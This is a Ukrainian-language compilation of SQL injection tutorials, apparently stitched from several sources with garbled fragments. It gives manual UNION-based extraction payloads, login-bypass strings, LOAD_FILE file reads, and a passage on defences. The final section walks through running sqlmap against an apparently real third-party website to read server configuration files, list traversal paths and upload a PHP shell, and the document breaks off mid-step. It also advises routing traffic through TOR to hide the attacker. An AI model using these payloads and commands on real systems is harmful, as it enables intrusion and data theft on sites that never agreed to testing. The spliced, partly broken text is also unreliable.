1. SQLMap іWAF (Web Application Firewall ): WAF є додатковим рівнем захисту веб-додатків, значно ускладнюючи аналіз та експлуатацію стандартними методами SQLMap . Існує функція “tamper —script ”, яка значно спрощує роботу з веб-додатками, що знаходяться за WAF 'ом.
2. SQLMap та анонімність:Якщо ви хочете приховати свою особистість і представитися анонімом для цільової програми, ви можете використовувати проксі-сервер TOR (The Onion Router). У SQLMap можна налаштувати проксі-сервер TOR для приховання джерела, з якого генерується трафік або запит такими ключами:
   • — tor – перемикання утиліти в режим використання TOR-проксі.
   • — — tor — type – ручне налаштування протоколу TOR-проксі (HTTP /SOCKS 4/4a /5).
   • — — check — tor – перевірка працездатності TOR-проксі

Вітаю тебе, читачу. Останнім часом, я захоплююсь Web-безпекою, та й певною мірою робота пов'язана з цим. Т.к. я дедалі частіше став помічати теми на різних форумах, з проханням показати, як це все працює, вирішив написати статтю. Стаття буде розрахована на тих, хто не стикався з подібним, але хотів би навчитися. У мережі відносно багато статей на цю тематику, але для початківців вони складні. Я постараюся описати все зрозумілою мовою та докладними прикладами.

Передмова

Вважаю, що одного прочитання статті буде мало, т.к. нам потрібні живі приклади – як відомо практика, у процесі запам'ятовування, не буває зайвою. Тому ми писатимемо вразливі скрипти та тренуватимемося на них.

Що таке SQL ін'єкція?

Батько написав у записці мамі, щоб вона дала Васі 100 рублів і поклав її на стіл. Переробивши це на жартівливий SQL мову, ми отримаємо:
ДІСТАНЬ З гаманця 100 РУБЛІВ І ДАЙ ЇХ Васі

Так як батько погано написав записку (Корявий почерк), і залишив її на столі, її побачив брат Васі - Петя. Петя, будучи хакером, дописав там «АБО Пете» і вийшов такий запит:
ДІСТАНЬ З гаманця 100 РУБЛІВ І ДАЙ ЇХ Васі АБО Петі

Мама прочитавши записку, вирішила, що Васі вона давала гроші вчора і дала 100 рублів Петі. Ось простий приклад SQL ін'єкції з життя:) Не фільтруючи дані (Мама ледве розібрала почерк), Петя добився профіту.

Підготовка

Пошук SQL injection

Як ви вже зрозуміли, ін'єкція з'являється з вхідних даних, які не фільтруються. Найпоширеніша помилка - це фільтрація передається ID. Ну грубо кажучи підставляти у всі поля лапки. Будь це GET/POST запит та навіть Cookie!

Числовий вхідний параметр

Т.к. у нас запит не має фільтрації:

$id = $_GET["id"]; $query = "SELECT * FROM news WHERE id=$id";

Скрипт зрозуміє це як

SELECT * FROM news WHERE id=1"

І дасть нам помилку:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given в C:\WebServ\domains\sqlinj\index1.php on line 16

Якщо помилку не видало - можуть бути такі причини:

1.SQL ін'єкції тут немає - Фільтруються лапки, або просто стоїть перетворення на (int)
2.Відключено виведення помилок.

Якщо все ж таки помилку вивело - Ура! Ми знайшли перший вид ін'єкції SQL - Числовий вхідний параметр.

Строковий вхідний параметр

Запити надсилатимемо на index2.php. У даному файлі запит має вигляд:
$user = $_GET["user"]; $query = "SELECT * FROM news WHERE user="$user"";

Тут ми робимо вибірку новини на ім'я користувача, і знову ж таки - не фільтруємо.
Знову посилаємо запит із лапкою:

Видало помилку. Ок! Значить уразливість є. Для початку нам вистачить – приступимо до практики.

Приступаємо до дій

Трохи теорії

Напевно, Вам вже не терпиться витягти щось із цього, крім помилок. Для початку дізнайтеся, що знак " -- вважається коментарем у мові SQL.

УВАГА! Перед та після нього обов'язково повинні стояти прогалини. В URL вони передаються як %20

Все, що йде після коментаря - буде відкинуто.
SELECT * FROM news WHERE user="AlexanderPHP" -- habrahabra

Виконається вдало. Можете спробувати це на скрипті index2.php, надіславши такий запит:

Sqlinj/index2.php?user=AlexanderPHP"%20--%20habrahabr

Вивчіть параметр UNION. У мові SQL ключове слово UNIONзастосовується об'єднання результатів двох SQL-запитів у єдину таблицю. Тобто для того, щоби витягнути щось нам потрібне з іншої таблиці.

Витягуємо з цього користь

Якщо параметр "Числовий", то в запиті нам не потрібно надсилати лапку і природно ставити коментар наприкінці. Повернемося до скрипту index1.php.

Звернімося до скрипту sqlinj/index1.php?id=1 UNION SELECT 1 . Запит до БД у нас виходить таким:
SELECT * FROM news WHERE id=1 UNION SELECT 1
І він дав нам помилку, т.к. Для роботи з поєднанням запитів, нам потрібна однакова кількість полів.

Т.к. ми не можемо вплинути на їх кількість у першому запиті, то нам потрібно підібрати їх кількість у другому, щоб воно дорівнювало першому.

Підбираємо кількість полів

Підбір полів робиться дуже просто, достатньо надсилати такі запити:
sqlinj/index1.php?id=1 UNION SELECT 1,2
Помилка…
sqlinj/index1.php?id=1 UNION SELECT 1,2,3
Знову помилка!
sqlinj/index1.php?id=1 UNION SELECT 1,2,3,4,5
Помилки нема! Значить кількість стовпців дорівнює 5.

GROUP BY

Якщо запит
sqlinj/index1.php?id=1 GROUP BY 2
не видав помилок, значить кількість полів більше 2. Пробуємо:

Sqlinj/index1.php?id=1 GROUP BY 8
Оп, бачимо помилку, означає кількість полів менше 8.

Якщо при GROUP BY 4 немає помилки, а при GROUP BY 6 - помилка, Значить кількість полів дорівнює 5

Визначення стовпців, що виводяться

Sqlinj/index1.php?id=-1 UNION SELECT 1,2,3,4,5

Цією дією ми визначили, які стовпці виводяться на сторінку. Тепер, щоб замінити ці цифри на потрібну інформацію, потрібно продовжити запит.

Виведення даних

Допустимо ми знаємо, що ще існує таблиця usersв якій існують поля id, nameі pass.
Нам потрібно отримати інформацію про користувача з ID=1

Отже побудуємо такий запит:

Sqlinj/index1.php?id=-1 UNION SELECT 1,2,3,4,5 FROM users WHERE id=1
Скрипт також продовжує виводити

Для цього ми підставимо назву полів за місце цифр 1 і 3

Sqlinj/index1.php?id=-1 UNION SELECT name,2,pass,4,5 FROM users WHERE id=1
Отримали те - що потрібно!

Для «рядкового вхідного параметра», як у скрипті index2.phpпотрібно додавати лапку на початку та знак коментаря в кінці. Приклад:
sqlinj/index2.php?user=-1" UNION SELECT name,2,pass,4,5 FROM users WHERE id=1 --%20

Читання/Запис файлів

Записування файлів

Читання файлів

Sqlinj/index2.php?user=-1" UNION SELECT 1,LOAD_FILE("1.php"),3,4,5 --%20

Таким чином, ми прочитали попередній записаний файл.

Способи захисту

Захиститись ще простіше, ніж використовувати вразливість. Просто фільтруйте дані. Якщо Ви передаєте числа, використовуйте
$id = (int) $_GET["id"];
Як підказав користувач malroc. Захищатись використанням PDO або prepared statements.

Замість завершення

SQL ін'єкція - це атака, яка задіяє динамічні оператори SQL, виносячи в коментарі певні частини інструкцій або додаючи умову, яка завжди буде дійсною. Вона націлена на дірки в архітектурі веб-додатків та використовує оператори SQL для виконання шкідливого SQL-коду:

У цій статті ми розглянемо методи, які використовуються під час SQL-ін'єкцій та способи захисту веб-додатків від таких атак.

Як працює SQL-ін'єкціях

Типи атак, які можуть бути виконані з використанням SQL-ін'єкції, різняться за типом механізмів бази даних, що вражаються. Атака націлюється на динамічні оператори SQL. Динамічний оператор — це оператор, який створюється під час виконання на основі параметрів із веб-форми або рядка запиту URI .

Розглянемо просте веб-додаток із формою входу. Код HTML-форми наведено нижче:

• Форма приймає адресу електронної пошти, а потім пароль відправляється у файл PHP з ім'ям index.php;
• Сесія зберігається у файлі cookie. Ця можливість активується під час встановлення прапорця remember_me . Для надсилання даних використовується метод post. Це означає, що значення не відображаються в URL-адресі .

Припустимо, що запит для перевірки ідентифікатора користувача на стороні сервера виглядає так:

• Запит використовує значення масиву $_POST безпосередньо, не саніруя його;
• Пароль шифрується з використанням алгоритму MD5.

Ми розглянемо атаку з використанням SQL ін'єкції sqlfiddle. Відкрийте у браузері URL-адресу http://sqlfiddle.com/ . На екрані з'явиться вікно.

Примітка: Вам потрібно буде написати інструкції SQL:

Крок 1. Введіть цей код у ліву панель:

CREATE TABLE `users` (`id` INT NOT NULL AUTO_INCREMENT, `email` VARCHAR(45) NULL, `password` VARCHAR(45) NULL, PRIMARY KEY(`id`)); insert in users (email,password) values ​​(" [email protected]"md5("abc"));

Крок 2. Натисніть кнопку « Build Schema».
Крок 3. Введіть наведений нижче код у правій панелі:

select * from users;

Крок 4. Натисніть « Run SQL». Ви побачите наступний результат:

Припустимо, що користувач надає адресу електронної пошти [email protected]і 1234 як пароля. Запит, який має бути виконаний у базі даних, може виглядати так:

Наведений вище код ін'єкції SQL приклад може бути обійдений шляхом виведення в коментарі частини пароля і додавання умови, яке завжди буде істинним. Припустимо, що зловмисник підставляє такі дані у полі адреси електронної пошти:

[email protected]" OR 1 = 1 LIMIT 1 -- " ]

та xxx у полі пароля.

Згенерований динамічний оператор буде виглядати так:

• [email protected]закінчується однією лапкою, яка завершує рядок;
• OR 1 = 1 LIMIT 1 — це умова, яка завжди буде істинною, вона обмежує результати, що повертаються, тільки одним записом.

0; 'AND... — це коментар SQL, який виключає частину пароля.

Скопіюйте наведений вище запит і вставте його у текстове поле SQL FiddleRun SQL, як показано нижче:

Хакерська активність: SQL-ін'єкції у веб-додатки

У нас є простий веб-додаток, доступний за адресою http://www.techpanda.org/, який спеціально зроблений вразливим для атак з використанням SQL ін'єкцій для новачків у демонстраційних цілях. Код HTML-форми, наведений вище, взято зі сторінки авторизації цієї програми.

Воно забезпечує базову безпеку, таку як санація поля електронної пошти. Це означає, що наведений код не може використовуватися для обходу даного механізму.

Ви можете використовувати поле пароля, щоб обійти його. На наведеній нижче діаграмі показано кроки, які потрібно виконати:

Припустимо, що зловмисник надає такі дані:

Крок 1: Вводить [email protected]як адреса електронної пошти;
Крок 2: Вводить xxx') OR 1 = 1 -];

Натискає кнопку «Надіслати».

Він буде направлений до панелі адміністрування. Згенерований запит буде виглядати так:

На наведеній нижче діаграмі показано, як запит було згенеровано:

Тут:

• У запиті передбачається, що використовується шифрування md5;
• Використовується одиночна лапка і дужка, що закривається;
• До оператора додається умова, яка завжди буде істинною.

Як правило, зловмисники для досягнення своїх цілей намагаються застосувати в атаці з використанням ін'єкцій SQL кілька різних методів.

Інші типи атак із використанням SQL-ін'єкцій

SQL-ін'єкції можуть завдати набагато більших збитків, ніж вхід в систему в обхід механізму авторизації. Деякі з таких атак можуть:

• Виконати видалення даних;
• Виконати оновлення даних;
• Виконати додавання даних;
• Виконати на сервері команди, які завантажуватимуть та встановлюватимуть шкідливі програми;
• Виконати експорт на віддалений сервер зловмисника цінних даних, таких як реквізити кредитної картки, електронна пошта та паролі.

Наведений вище список не повний. Він просто дає уявлення про те, яку небезпеку становлять SQL-ін'єкції.

Інструменти для автоматизації SQL-ін'єкцій

У наведеному прикладі ми використовували методи ручної атаки. Перед тим, як зробити SQL ін'єкцію, потрібно розуміти, що існують автоматизовані інструменти, які дозволяють виконувати атаки ефективніше та швидше:

• SQLSmack;
• SQLPing 2;
• SQLMap.

Як запобігти SQL-ін'єкції

Ось кілька простих правил, які дозволять захиститися від атак з використанням SQL-ін'єкцій:

Введення даних користувача не повинно бути довіреним. Його завжди потрібно санувати, перш ніж дані використовуватимуться в динамічних операціях SQL.

Збережені процедури— вони можуть інкапсулювати SQL-запити та обробляти всі вхідні дані як параметри.

Підготовлені запити— спочатку створюються запити, а потім усі надані дані користувача обробляються як параметри. Це не впливає на синтаксис інструкції SQL.

Регулярні вирази- можуть бути використані для виявлення потенційно шкідливого коду та його видалення перед виконанням операторів SQL.

Права доступу на підключення до бази даних– щоб захиститися від ін'єкцій SQL, облікові записи, які використовуються для підключення до бази даних, повинні надавати лише необхідні права доступу. Це допоможе обмежити дії, які SQL-оператори можуть виконувати на сервері.

Повідомлення про помилки- не повинні розкривати конфіденційну інформацію. Прості повідомлення користувача про помилки, такі як « Вибачте, виникла помилка. Служба підтримки вже повідомлена про неї. Повторіть спробу пізніше», можна використовувати замість відображення запитів SQL, що викликали помилку.

Спойлер: .DZEN

У нас є SQL Injection на сайт, який виглядає так,

Насамперед нам бажано перевірити, чи маємо ми привілеї на запис файлів на атакованому ресурсі, для цього завантажуємо термінал і даємо наступну команду:

http://www.sacoor.com/site_terms.php?lang=en --banner --current-db --current-user --is-dba

Тиснемо Enter і починається аналіз нашої SQL Injection, виглядає звіт наступним чином:

Як ви бачите у звіті написано версію Apache, версію MySQL, і версію ОС, встановлену на сервері, все це нам знадобиться надалі, але найголовніше ви бачите, що ми маємо права на запис файлів, це відображається в рядку Current User is DBA: True

Наступним кроком для нас є отримання шляхів для запису нашого шеллу. Шлях до нашого сайту на сервері ми можемо отримати завантаживши файл httpd.conf. Інформацію про місцезнаходження файлу httpd.conf ми отримуємо за допомогою Google, можна пошукати за версією ОС, яка встановлена ​​або за списком найімовірніших шляхів. Загалом не заглиблюватимуся в серфінг по пошукових системах, просто коли з'ясували найбільш ймовірне місце розташування шляху до файлу, то саме час завантажити цей файл до себе на диск, для цього вводимо наступну команду і запитуємо читання файлу на сервері:

Sqlmap –u http://www.sacoor.com/site_terms.php?lang=en --file-read=/etc/httpd/conf/httpd.conf

Відразу відзначимо, що не завжди вдається знайти цей конфіг-файл з першого разу, тому ви можете використовувати найбільш ймовірні шляхи, якими цей файл може знаходитися:

СПИСОК ВІРОЯТНИХ ШЛЯХІВ ДО ФАЙЛУ КОНФІГУ:

../../../../../../../../../usr/local/apache/conf/httpd.conf ../../../../ ../../../../../usr/local/apache2/conf/httpd.conf ../../../../../../../../ usr/local/apache/httpd.conf ../../../../../../../../usr/local/apache2/httpd.conf ../../.. /../../../../../usr/local/httpd/conf/httpd.conf ../../../../../../../usr/ local/etc/apache/conf/httpd.conf ../../../../../../../usr/local/etc/apache2/conf/httpd.conf ../.. /../../../../../usr/local/etc/httpd/conf/httpd.conf ../../../../../../../ usr/apache2/conf/httpd.conf ../../../../../../../usr/apache/conf/httpd.conf ../../../.. /../../../usr/local/apps/apache2/conf/httpd.conf ../../../../../../../usr/local/apps/ apache/conf/httpd.conf ../../../../../../etc/apache/conf/httpd.conf ../../../../../. ./etc/apache2/conf/httpd.conf ../../../../../../etc/httpd/conf/httpd.conf ../../../../ ../../etc/http/conf/httpd.conf ../../../../../../etc/apache2/httpd.conf ../../../. ./../../etc/httpd/httpd.conf ../../../../../../etc/http/httpd.conf ../../../. ./../../etc/httpd.conf ../../../../../opt/apache/conf/httpd.conf ../../../../. ./opt/apache2/conf/httpd.conf ../../../../var/www/conf/httpd.conf ../conf/httpd.conf

Ми отримуємо звіт від sqlmap у такому вигляді:

Як ви бачите, sqlmap нам сказав, що файл має такий самий розмір, як і файл на сервері, отже ми маємо право на читання цього файлу. Якби прав на читання цього файлу не вистачало, то вилізла б помилка, що файл збережений на нашій машині має інший розмір на відміну від файлу на сервері або файлу на сервері по вказаному нами шляху немає і ніколи не було. Sqlmap зберіг наш файл у файлах звіту, а щоб прочитати його потрібно запустити віконний менеджер. Для запуску віконного менеджера ми відкриваємо ще одне вікно терміналу та вводимо команду:

Далі у менеджері, що відкрився, йдемо по шляху, куди sqlmap склав файл тобто:
/root/.sqlmap/output/sacoor.com
Далі, навівши курсор на файлик, натискаємо кнопку F3 на клавіатурі і читаємо конфіг-файл Apache:

З нашого конфіг-файлу ми бачимо, що наш сайт лежить на сервері наступним шляхом:
/home/sbshop/site/

Тепер, коли ми маємо небагато інформації, можна спробувати залити шелл, для цього вводимо наступну команду:

Sqlmap –u http://www.sacoor.com/site_terms.php?lang=en --os-cmd –v l

Після введення команди sqlmap запитає який тип заливника хочемо використовувати, т.к. у нашому випадку сайт на PHP, то і заливати ми будемо PHP-loader, вибираємо пункт 4 і тиснемо Enter. Далі, sqlmap попросить вибрати нас куди ми заливатимемо наш завантажувач, а т.к. ми вже знаємо шлях до нашого сайту на сервері, то вибираємо пункт 2, натискаємо Enter і вказуємо шлях до сайту:
/home/sbshop/site/

А після цього тиснемо Enter і бачимо наступний звіт:

В даному випадку sqlmap нам каже, що в цю папку ми не маємо прав на запис. Чи не біда, цю проблему досить легко вирішити. Даємо команду на запуск uniscan і чекаємо файли та папки на можливість запису, ось команда.